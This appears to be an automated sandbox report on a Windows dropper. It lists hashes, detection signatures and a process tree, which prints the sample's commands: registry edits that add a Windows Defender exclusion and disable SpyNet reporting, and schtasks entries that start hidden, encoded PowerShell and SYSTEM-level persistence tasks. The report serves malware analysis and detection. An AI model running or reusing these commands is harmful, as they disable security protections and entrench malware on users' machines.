Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
19/11/2023, 01:17
Static task
static1
Behavioral task
behavioral1
Sample
3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe
Resource
win7-20231023-en
General
-
Target
3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe
-
Size
7.1MB
-
MD5
22b6fb2e97afec315c96ae35145d24d5
-
SHA1
d58e472d7e71b7e86c509b5913c3246917054966
-
SHA256
3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be
-
SHA512
91e7f6efb08117be50187a181ebf6e5ffdfa362cea905889be63b010fa89492bb0ae3710771752b9e2e4b4b38f8d5d359ce8450bf5634d3e76f5c432d4e725f0
-
SSDEEP
196608:91OeVRGMxLNyzxhshZJ+CjfKWg04aj7F0Ad:3OkRGMxLUhshSJn0BFF
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 250 5032 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation PdEQbdf.exe -
Executes dropped EXE 4 IoCs
pid Process 3252 Install.exe 1060 Install.exe 4788 bSZuSHX.exe 3384 PdEQbdf.exe -
Loads dropped DLL 1 IoCs
pid Process 5032 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json PdEQbdf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\anbeheknilinnhalejpdnaobfhlokibb\1.0.0.0\manifest.json PdEQbdf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json PdEQbdf.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini PdEQbdf.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 PdEQbdf.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol bSZuSHX.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B PdEQbdf.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini bSZuSHX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 PdEQbdf.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA PdEQbdf.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 PdEQbdf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 PdEQbdf.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi PdEQbdf.exe File created C:\Program Files (x86)\rFkCZBmYGfkU2\wiOYdmvHUsXrQ.dll PdEQbdf.exe File created C:\Program Files (x86)\rFkCZBmYGfkU2\XadfikF.xml PdEQbdf.exe File created C:\Program Files (x86)\FncWqVonEAflrVaxqNR\bnWItux.xml PdEQbdf.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak PdEQbdf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak PdEQbdf.exe File created C:\Program Files (x86)\FncWqVonEAflrVaxqNR\rpNYumP.dll PdEQbdf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja PdEQbdf.exe File created C:\Program Files (x86)\IjchgTxaUtSoC\nTJuXzY.xml PdEQbdf.exe File created C:\Program Files (x86)\abetkicELaUn\VoFLJoq.dll PdEQbdf.exe File created C:\Program Files (x86)\EUszDIIxU\iYmHsr.dll PdEQbdf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi PdEQbdf.exe File created C:\Program Files (x86)\EUszDIIxU\bmimjiL.xml PdEQbdf.exe File created C:\Program Files (x86)\IjchgTxaUtSoC\aOtfvwZ.dll PdEQbdf.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bRiKnmLOZFdkMPGuzv.job schtasks.exe File created C:\Windows\Tasks\ULPYamQDIjWIhTUbi.job schtasks.exe File created C:\Windows\Tasks\PyTaEsvcdFypYsh.job schtasks.exe File created C:\Windows\Tasks\oYgNoNeTxNTUFfDli.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1212 schtasks.exe 1212 schtasks.exe 2360 schtasks.exe 424 schtasks.exe 3108 schtasks.exe 4736 schtasks.exe 1260 schtasks.exe 3188 schtasks.exe 2132 schtasks.exe 376 schtasks.exe 2124 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" PdEQbdf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PdEQbdf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume PdEQbdf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" PdEQbdf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{650106ce-0000-0000-0000-d01200000000}\NukeOnDelete = "0" PdEQbdf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{650106ce-0000-0000-0000-d01200000000} PdEQbdf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{650106ce-0000-0000-0000-d01200000000}\MaxCapacity = "14116" PdEQbdf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket PdEQbdf.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix PdEQbdf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing PdEQbdf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PdEQbdf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PdEQbdf.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 4656 powershell.EXE 4656 powershell.EXE 4656 powershell.EXE 564 powershell.exe 564 powershell.exe 564 powershell.exe 1732 powershell.exe 1732 powershell.exe 1732 powershell.exe 4896 powershell.EXE 4896 powershell.EXE 4896 powershell.EXE 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe 3384 PdEQbdf.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4656 powershell.EXE Token: SeDebugPrivilege 564 powershell.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 4896 powershell.EXE Token: SeManageVolumePrivilege 1256 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4884 wrote to memory of 3252 4884 3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe 87 PID 4884 wrote to memory of 3252 4884 3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe 87 PID 4884 wrote to memory of 3252 4884 3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe 87 PID 3252 wrote to memory of 1060 3252 Install.exe 90 PID 3252 wrote to memory of 1060 3252 Install.exe 90 PID 3252 wrote to memory of 1060 3252 Install.exe 90 PID 1060 wrote to memory of 1576 1060 Install.exe 95 PID 1060 wrote to memory of 1576 1060 Install.exe 95 PID 1060 wrote to memory of 1576 1060 Install.exe 95 PID 1060 wrote to memory of 2676 1060 Install.exe 97 PID 1060 wrote to memory of 2676 1060 Install.exe 97 PID 1060 wrote to memory of 2676 1060 Install.exe 97 PID 1576 wrote to memory of 564 1576 forfiles.exe 99 PID 1576 wrote to memory of 564 1576 forfiles.exe 99 PID 1576 wrote to memory of 564 1576 forfiles.exe 99 PID 2676 wrote to memory of 4344 2676 forfiles.exe 100 PID 2676 wrote to memory of 4344 2676 forfiles.exe 100 PID 2676 wrote to memory of 4344 2676 forfiles.exe 100 PID 564 wrote to memory of 1664 564 cmd.exe 101 PID 564 wrote to memory of 1664 564 cmd.exe 101 PID 564 wrote to memory of 1664 564 cmd.exe 101 PID 4344 wrote to memory of 1176 4344 cmd.exe 102 PID 4344 wrote to memory of 1176 4344 cmd.exe 102 PID 4344 wrote to memory of 1176 4344 cmd.exe 102 PID 564 wrote to memory of 4800 564 cmd.exe 103 PID 564 wrote to memory of 4800 564 cmd.exe 103 PID 564 wrote to memory of 4800 564 cmd.exe 103 PID 4344 wrote to memory of 4428 4344 cmd.exe 104 PID 4344 wrote to memory of 4428 4344 cmd.exe 104 PID 4344 wrote to memory of 4428 4344 cmd.exe 104 PID 1060 wrote to memory of 1260 1060 Install.exe 106 PID 1060 wrote to memory of 1260 1060 Install.exe 106 PID 1060 wrote to memory of 1260 1060 Install.exe 106 PID 1060 wrote to memory of 1088 1060 Install.exe 108 PID 1060 wrote to memory of 1088 1060 Install.exe 108 PID 1060 wrote to memory of 1088 1060 Install.exe 108 PID 4656 wrote to memory of 3432 4656 powershell.EXE 112 PID 4656 wrote to memory of 3432 4656 powershell.EXE 112 PID 1060 wrote to memory of 876 1060 Install.exe 119 PID 1060 wrote to memory of 876 1060 Install.exe 119 PID 1060 wrote to memory of 876 1060 Install.exe 119 PID 1060 wrote to memory of 3188 1060 Install.exe 122 PID 1060 wrote to memory of 3188 1060 Install.exe 122 PID 1060 wrote to memory of 3188 1060 Install.exe 122 PID 4788 wrote to memory of 564 4788 bSZuSHX.exe 132 PID 4788 wrote to memory of 564 4788 bSZuSHX.exe 132 PID 4788 wrote to memory of 564 4788 bSZuSHX.exe 132 PID 564 wrote to memory of 212 564 powershell.exe 135 PID 564 wrote to memory of 212 564 powershell.exe 135 PID 564 wrote to memory of 212 564 powershell.exe 135 PID 212 wrote to memory of 4772 212 cmd.exe 136 PID 212 wrote to memory of 4772 212 cmd.exe 136 PID 212 wrote to memory of 4772 212 cmd.exe 136 PID 564 wrote to memory of 4896 564 powershell.exe 137 PID 564 wrote to memory of 4896 564 powershell.exe 137 PID 564 wrote to memory of 4896 564 powershell.exe 137 PID 564 wrote to memory of 3156 564 powershell.exe 138 PID 564 wrote to memory of 3156 564 powershell.exe 138 PID 564 wrote to memory of 3156 564 powershell.exe 138 PID 564 wrote to memory of 4224 564 powershell.exe 139 PID 564 wrote to memory of 4224 564 powershell.exe 139 PID 564 wrote to memory of 4224 564 powershell.exe 139 PID 564 wrote to memory of 1644 564 powershell.exe 140 PID 564 wrote to memory of 1644 564 powershell.exe 140
Processes
-
C:\Users\Admin\AppData\Local\Temp\3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe"C:\Users\Admin\AppData\Local\Temp\3f0b50642b6727fc4105415facfe4331153b6acf295f751f03cbbf624cfb30be.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Users\Admin\AppData\Local\Temp\7zS949F.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Users\Admin\AppData\Local\Temp\7zS95D7.tmp\Install.exe.\Install.exe /Tndidsl "525403" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:564 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1664
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4800
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4344 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1176
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4428
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfQMiTYvb" /SC once /ST 00:04:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfQMiTYvb"4⤵PID:1088
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfQMiTYvb"4⤵PID:876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRiKnmLOZFdkMPGuzv" /SC once /ST 01:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\SNvmPmIhBpGbmlc\bSZuSHX.exe\" Gy /NQsite_idILM 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3188
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3432
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5060
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:60
-
C:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\SNvmPmIhBpGbmlc\bSZuSHX.exeC:\Users\Admin\AppData\Local\Temp\knkIMJmkYxNLeRxtR\SNvmPmIhBpGbmlc\bSZuSHX.exe Gy /NQsite_idILM 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4788 -
